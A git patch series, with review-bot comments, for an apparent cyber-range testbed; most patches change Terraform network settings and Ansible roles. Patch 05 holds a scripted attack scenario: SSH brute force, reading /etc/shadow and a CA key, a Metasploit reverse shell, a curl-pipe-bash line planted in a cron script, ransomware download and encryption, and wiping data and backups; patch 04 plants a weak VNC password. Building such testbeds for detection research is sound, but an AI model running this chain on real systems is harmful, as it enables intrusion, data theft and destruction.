From 8047d2b1761a15f5a0fd4442444813c6194177ce Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Fri, 27 Sep 2024 10:27:39 +0200 Subject: [PATCH 01/12] use network uuids --- terragrunt/bootstrap/module/main.tf | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 985a7ab..30d0a86 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.inet_cidr,514) } @@ -166,17 +166,17 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.inet_cidr,254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.lan_cidr,254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.dmz_cidr,254) } @@ -228,17 +228,17 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_internet_ip } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_lan_ip } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_dmz_ip } From a2f765c57214eddd7887bad13a64b5c9e4a8fe9f Mon Sep 17 00:00:00 2001 
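Review bot: The new `uuid = "${openstack_networking_network_v2.internet.id}"` lines, in all three hunks of terragrunt/bootstrap/module/main.tf, wrap a single reference in a string template, which is redundant in Terraform 0.12 and later and is commonly reported by linters as deprecated interpolation. Write the bare reference instead, `uuid = openstack_networking_network_v2.internet.id`, and likewise for `lan` and `dmz`. The reason for the switch is worth a comment above the first `network` block, for example `# attach by id: network names are not unique, the id binds to the network this module created`. The resource bodies start and end outside the hunks.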
From: thorinaboenke Date: Mon, 30 Sep 2024 12:24:25 +0200 Subject: [PATCH 02/12] use network uuids in videoserver module --- terragrunt/videoserver/module/adminpc.tf | 13 +++++++++++-- .../videoserver/module/adminpc_variables.tf | 2 +- terragrunt/videoserver/module/dnsserver.tf | 11 ++++++++++- .../videoserver/module/dnsserver_variables.tf | 2 +- .../videoserver/module/fetch_network_uuid.sh | 18 ++++++++++++++++++ terragrunt/videoserver/module/videoserver.tf | 11 ++++++++++- .../module/videoserver_variables.tf | 2 +- terragrunt/videoserver/module/webcam.tf | 3 ++- .../videoserver/module/webcam_variables.tf | 2 +- 9 files changed, 55 insertions(+), 9 deletions(-) create mode 100644 terragrunt/videoserver/module/fetch_network_uuid.sh diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index a879f2f..36d1bb6 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -4,8 +4,17 @@ locals { #################################################################### # -# CREATE INSTANCE for "VIDEOSERVER" +# CREATE INSTANCE for "ADMIN" # + +data "external" "lan_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "lan" + } +} + data "template_file" "userdata_adminpc" { template = "${file("${local.ext_adminpc_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "lan" + uuid ="${data.external.lan_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.lan_cidr,222) } diff --git a/terragrunt/videoserver/module/adminpc_variables.tf b/terragrunt/videoserver/module/adminpc_variables.tf index f0c926c..7f38d91 100644 --- a/terragrunt/videoserver/module/adminpc_variables.tf +++ b/terragrunt/videoserver/module/adminpc_variables.tf 
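Review bot: `program = ["bash", "./fetch_network_uuid.sh"]` in the new `data "external" "lan_uuid"` block names the script relative to the working directory of the Terraform process, not to the module, so the plan runs whichever file of that name sits in the directory it was started from. Anchor it to the module with `program = ["bash", "${path.module}/fetch_network_uuid.sh"]`. The `internet_uuid` block in dnsserver.tf and the `dmz_uuid` block in videoserver.tf use the same relative path. A one-line comment above the block should say that the script needs `jq`, the `openstack` CLI and `OS_PROJECT_ID` on the machine that runs the plan.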
@@ -6,7 +6,7 @@ variable "adminpc_image" { variable "adminpc_flavor" { type = string description = "flavor of the adminpc host" - default = "m1.small" + default = "d2-2" } variable "adminpc_userdata" { diff --git a/terragrunt/videoserver/module/dnsserver.tf b/terragrunt/videoserver/module/dnsserver.tf index 5a184a1..a169967 100644 --- a/terragrunt/videoserver/module/dnsserver.tf +++ b/terragrunt/videoserver/module/dnsserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "DNS-Server" # + +data "external" "internet_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "internet" + } +} + data "template_file" "userdata_dnsserver" { template = "${file("${local.ext_dnsserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "dnsserver" { user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered network { - name = "internet" + uuid = "${data.external.internet_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.inet_cidr,233) } diff --git a/terragrunt/videoserver/module/dnsserver_variables.tf b/terragrunt/videoserver/module/dnsserver_variables.tf index 629299a..39d727f 100644 --- a/terragrunt/videoserver/module/dnsserver_variables.tf +++ b/terragrunt/videoserver/module/dnsserver_variables.tf @@ -6,7 +6,7 @@ variable "dnsserver_image" { variable "dnsserver_flavor" { type = string description = "flavor of the dnsserver host" - default = "m1.small" + default = "d2-2" } variable "dnsserver_userdata" { diff --git a/terragrunt/videoserver/module/fetch_network_uuid.sh b/terragrunt/videoserver/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/videoserver/module/fetch_network_uuid.sh 
@@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/videoserver.tf b/terragrunt/videoserver/module/videoserver.tf index 15c1321..734513a 100644 --- a/terragrunt/videoserver/module/videoserver.tf +++ b/terragrunt/videoserver/module/videoserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "VIDEOSERVER" # + +data "external" "dmz_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "dmz" + } +} + data "template_file" "userdata_videoserver" { template = "${file("${local.ext_videoserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "videoserver" { user_data = local.ext_videoserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitvideoserver[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,121) } diff --git a/terragrunt/videoserver/module/videoserver_variables.tf b/terragrunt/videoserver/module/videoserver_variables.tf index 4b4f250..61ee45a 100644 --- a/terragrunt/videoserver/module/videoserver_variables.tf +++ b/terragrunt/videoserver/module/videoserver_variables.tf 
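Review bot: Nothing checks `UUID` before it is emitted, so a name that matches no network yields `{"uuid":""}` and a name that matches several yields a multi-line string, and either is passed to the `network` block as if it were an id. Add a guard after the lookup, `[[ "$UUID" =~ ^[0-9a-fA-F-]{36}$ ]] || { echo "expected exactly one network named $NETWORK_NAME" >&2; exit 1; }`, and change the header to `set -euo pipefail` so an unset `OS_PROJECT_ID` stops the script instead of becoming `--project ""`. The comment "NETWORK_NAME and shell variables" looks like a leftover from a template and should read "into the NETWORK_NAME shell variable". The identical copies added later in this series under terragrunt/attacker/module/ and terragrunt/ have the same gap.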
@@ -6,7 +6,7 @@ variable "videoserver_image" { variable "videoserver_flavor" { type = string description = "flavor of the videoserver host" - default = "m1.small" + default = "d2-2" } variable "videoserver_userdata" { diff --git a/terragrunt/videoserver/module/webcam.tf b/terragrunt/videoserver/module/webcam.tf index 426857c..50a0b85 100644 --- a/terragrunt/videoserver/module/webcam.tf +++ b/terragrunt/videoserver/module/webcam.tf @@ -6,6 +6,7 @@ locals { # # CREATE INSTANCE for "Webcam-Server" # + data "template_file" "userdata_webcam" { template = "${file("${local.ext_webcam_userdata_file}")}" } @@ -35,7 +36,7 @@ resource "openstack_compute_instance_v2" "webcam" { user_data = local.ext_webcam_userdata_file == null ? null : data.template_cloudinit_config.cloudinitwebcam[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,80) } diff --git a/terragrunt/videoserver/module/webcam_variables.tf b/terragrunt/videoserver/module/webcam_variables.tf index b2b8d83..5536b81 100644 --- a/terragrunt/videoserver/module/webcam_variables.tf +++ b/terragrunt/videoserver/module/webcam_variables.tf @@ -6,7 +6,7 @@ variable "webcam_image" { variable "webcam_flavor" { type = string description = "flavor of the webcam host" - default = "m1.small" + default = "d2-2" } variable "webcam_userdata" { From c004e3a1782c919c8aad2ac18c37a28a290c891d Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Mon, 4 Nov 2024 12:41:37 +0100 Subject: [PATCH 03/12] scenario numbering --- ansible/run/scenario3/templates/scenario_3_a_a.j2 | 2 +- ansible/run/scenario3/templates/scenario_3_b.j2 | 2 +- ansible/run/scenario3/templates/scenario_3_c.j2 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/run/scenario3/templates/scenario_3_a_a.j2 b/ansible/run/scenario3/templates/scenario_3_a_a.j2 index 0740e54..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_a.j2 
+++ b/ansible/run/scenario3/templates/scenario_3_a_a.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 a a # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_b.j2 b/ansible/run/scenario3/templates/scenario_3_b.j2 index 60e3ce8..2a6fc47 100644 --- a/ansible/run/scenario3/templates/scenario_3_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 b # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_c.j2 b/ansible/run/scenario3/templates/scenario_3_c.j2 index db5751b..7a057c0 100644 --- a/ansible/run/scenario3/templates/scenario_3_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_c.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 c # #################### vars: From d8a4445fca66356b6f72811423f2650c92ffe51a Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:04:53 +0100 Subject: [PATCH 04/12] prep scenario 3 a b --- ansible/run/scenario3/templates/scenario_3_a_b.j2 | 0 packer/firewall/playbook/main.yaml | 1 + packer/repository/playbook/main.yaml | 14 ++++++++++---- packer/repository/playbook/requirements.yml | 4 +++- 4 files changed, 14 insertions(+), 5 deletions(-) create mode 100644 ansible/run/scenario3/templates/scenario_3_a_b.j2 diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 new file mode 100644 index 0000000..e69de29 diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index 1c92bc7..83bef6b 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml 
@@ -83,6 +83,7 @@ - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER:22", proto: tcp, dest_port: 10022 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 3389 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 4501 } + - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 5901 } - Reposerver to Linux-Share - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 1881 } - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 111,2049 } diff --git a/packer/repository/playbook/main.yaml b/packer/repository/playbook/main.yaml index d51577a..e992f7c 100644 --- a/packer/repository/playbook/main.yaml +++ b/packer/repository/playbook/main.yaml @@ -26,6 +26,11 @@ hostname_fqdn: "puppet.aecid-testbed.local" hostname_ip: "172.17.100.122" - role: aeciduser + - role: weaklinuxuser + vars: + weaklinuxuser_sudo: False + weaklinuxuser_groups: + - sudo vars: # pass: aecid aeciduser_pass: "$6$9AqxTPJqYsFXwgPN$xAC4y1Vndk00EaBCuFcJC37BYDYYVAgt9SHymg15KSdKddZnwG.SsQaJvHarH4DYQj3tuboeLa4G5EfL7itcC0" @@ -35,11 +40,12 @@ - role: manage_unattended_upgrades - role: auditd - role: mate-desktop - - role: weaklinuxuser + - role: tightvnc vars: - weaklinuxuser_sudo: False - weaklinuxuser_groups: - - sudo + vnc_user: "john" + vnc_password: "12345678" + vnc_display: ":1" + vnc_port: 5901 - role: puppetserver - role: disableresolved - role: acct diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 3a3269b..eea2d34 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -44,4 +44,6 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-puppetserver.git version: v1.0.0 name: puppetserver - + - src: https://github.com/ait-testbed/atb-ansible-tightvnc.git + version: v1.0.0 + name: tightvnc 
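Review bot: The `weaklinuxuser` entry is inserted between `- role: aeciduser` and the `vars:` block that carries `aeciduser_pass`, so as far as the flattened hunk shows, the list now reads `aeciduser` with no vars followed by `weaklinuxuser` with two `vars:` keys. If the indentation is unchanged from the old file, a duplicate-key load keeps only the second `vars:`, which would drop `weaklinuxuser_sudo: False` and the group list and leave `aeciduser` without its password hash. Move the five added lines below the end of the existing `aeciduser` vars block so each role keeps its own `vars:`. The roles list starts and ends outside the hunk.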
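Review bot: `vnc_password: "12345678"` is committed in clear text with nothing marking it as deliberate, unlike `aeciduser_pass`, which is stored as a hash under a `# pass:` comment. Add a comment above the `tightvnc` vars such as `# intentionally weak VNC credential for scenario 3 a b; testbed images only`. Consider taking the value from a variable with this default, so an image built for another purpose does not inherit it. The same marker belongs on the new `dest_port: 5901` DNAT rule in packer/firewall/playbook/main.yaml, which publishes this service to the `inet` zone.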
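Review bot: `version: v1.0.0` pins the new `tightvnc` role to a git tag, and a tag can be moved to another commit after review, so the image build is not guaranteed to install the code that was inspected. `version:` also accepts a commit hash; pin the entry as `version: <full-commit-sha>  # v1.0.0` (placeholder, take the hash from the tagged release). The `puppetserver` entry above follows the same tag convention, so this may be better done for the whole file in a separate change.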
From 2d2ef873c15c68238f6df3c09a47ac5021366a82 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:06:23 +0100 Subject: [PATCH 05/12] scenario 3 a b --- .../run/scenario3/templates/scenario_3_a_b.j2 | 175 ++++++++++++++++++ 1 file changed, 175 insertions(+) diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 index e69de29..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 
@@ -0,0 +1,175 @@ +#################### +# +# Scenario 3 a a +# +#################### +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + $DNS_SERVER: 192.42.0.233 + +commands: + - type: shell + cmd: hydra -C user_pass_combo.txt -s 10022 $SERVER_ADDRESS ssh + + - type: ssh + creates_session: foothold + username: john + password: rambo + hostname: $SERVER_ADDRESS + port: 10022 + cmd: id + + - type: ssh + session: foothold + cmd: "tcpdump -A port 21\n" + interactive: True + + - type: sleep + seconds: 20 + + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + - type: ssh + session: foothold + cmd: "sudo -i\n" + interactive: True + + - type: ssh + session: foothold + cmd: "rambo\n" + interactive: True + + - type: ssh + session: foothold + cmd: "id\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /etc/shadow\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /media/share/healthcheck_cron.sh\n" + interactive: True + + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + - type: ssh + session: foothold + cmd: "vim /media/share/healthcheck_cron.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "G" + interactive: True + + - type: ssh + session: foothold + cmd: "o" + interactive: True + + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh | 
bash\n" + interactive: True + + - type: ssh + session: foothold + cmd: "1B" + interactive: True + bin: True + + - type: ssh + session: foothold + cmd: ":wq\n" + interactive: True +################### MOVED ############################################ + - type: msf-session + session: movement + cmd: sysinfo + + - type: msf-session + session: movement + cmd: getuid + + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + + - type: msf-session + session: movement + cmd: find /media/data/Images + + - type: msf-session + session: movement + cmd: cat /etc/passwd + + - type: msf-session + session: movement + cmd: userdel -f john + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service From c66c3a9d91e487d4f07e2db2ca0b34c53ade18c8 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:38:05 +0100 Subject: [PATCH 06/12] use scenario 3_a_b in attacker main --- ansible/run/scenario3/main.yml | 86 ++++++++++++++++++++-------------- 1 file changed, 50 insertions(+), 36 deletions(-) diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 88e74a6..11c180f 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -37,6 +37,7 @@ mode: '0755' loop: - scenario_3_a_a + - scenario_3_a_b - upgrade - scenario_3_b - scenario_3_c 
@@ -49,50 +50,63 @@ - install - playbooks - - name: "Run Scenario 3 a a" + # - name: "Run Scenario 3 a a" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_a_a + # - metasploit + # - attackmate + # - exploit + + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_b.yml" chdir: "{{user_home.stdout}}" tags: - - scenario_3_a_a + - scenario_3_a_b - metasploit - attackmate - exploit - - name: "Run Scenario 3 b" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_b - - metasploit - - attackmate - - exploit + # - name: "Run Scenario 3 b" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_b + # - metasploit + # - attackmate + # - exploit - - name: "Run Scenario 3 c" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_c - - metasploit - - attackmate - - exploit + # - name: "Run Scenario 3 c" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_c + # - metasploit + # - attackmate + # - exploit + + # - name: "Run Scenario 3 d" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - 
scenario_3_d + # - metasploit + # - attackmate + # - exploit - - name: "Run Scenario 3 d" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_d - - metasploit - - attackmate - - exploit From 78be9a4ccc12fbb169782370bc95f185282c8aaf Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 15:55:37 +0100 Subject: [PATCH 07/12] update state repo --- terragrunt/terragrunt.hcl | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/terragrunt/terragrunt.hcl b/terragrunt/terragrunt.hcl index 0c570c5..7b1351b 100644 --- a/terragrunt/terragrunt.hcl +++ b/terragrunt/terragrunt.hcl 
@@ -1,9 +1,9 @@ remote_state { backend = "http" config = { - address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" - lock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" - unlock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" + lock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + unlock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" username = "${get_env("GITLAB_USERNAME")}" password = "${get_env("CR_GITLAB_ACCESS_TOKEN")}" lock_method = "POST" From 11a99fc66296b9fa65728ffb2b3d78c2f839757e Mon Sep 17 00:00:00 2001 
From: thorinaboenke Date: Wed, 26 Feb 2025 16:06:58 +0100 Subject: [PATCH 08/12] update fetched network uuids --- .../attacker/module/fetch_network_uuid.sh | 18 ++++++++++++++ terragrunt/bootstrap/module/main.tf | 24 ++++++++++--------- terragrunt/bootstrap/terragrunt.hcl | 6 ++--- terragrunt/fetch_network_uuid.sh | 18 ++++++++++++++ terragrunt/videoserver/module/adminpc.tf | 2 +- 5 files changed, 53 insertions(+), 15 deletions(-) create mode 100644 terragrunt/attacker/module/fetch_network_uuid.sh create mode 100644 terragrunt/fetch_network_uuid.sh diff --git a/terragrunt/attacker/module/fetch_network_uuid.sh b/terragrunt/attacker/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/attacker/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 259b33f..caf308b 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],514) } 
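Review bot: terragrunt/attacker/module/fetch_network_uuid.sh is a byte-identical copy of terragrunt/videoserver/module/fetch_network_uuid.sh (both are blob `7357333`), and this patch adds a third copy at terragrunt/fetch_network_uuid.sh, so any fix to the lookup has to be made three times. Keep one script and have each `data "external"` block reference it by path. Until then, add a header comment in each copy such as `# copy of terragrunt/fetch_network_uuid.sh; keep in sync`. The attacker module's use of the script is not visible in this series.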
@@ -220,27 +220,27 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["lan"],254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["dmz"],254) } network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["admin"],254) } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["user"],254) } @@ -298,30 +298,32 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_ips.internet } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_ips.lan } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_ips.dmz } + network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = local.mgmt_ips.admin } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = local.mgmt_ips.user } + depends_on = [ openstack_networking_network_v2.dmz, openstack_networking_network_v2.internet, diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 3e52381..7af7c4f 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl 
@@ -11,10 +11,10 @@ inputs = { host_userdata = "firewallinit.yml" ext_router = "taq-router" sshkey = "testbed-key" - inetdns_image = "ubuntu-2204" + inetdns_image = "Ubuntu 22.04" inetfw_image = "atb-fw-inet-lan-dmz-image-2023-08-24T13-50-01Z" - mgmt_image = "ubuntu-2204" - floating_pool = "provider-aecid-208" + mgmt_image = "Ubuntu 22.04" + floating_pool = "AECID-provider-network" } diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/adminpc.tf 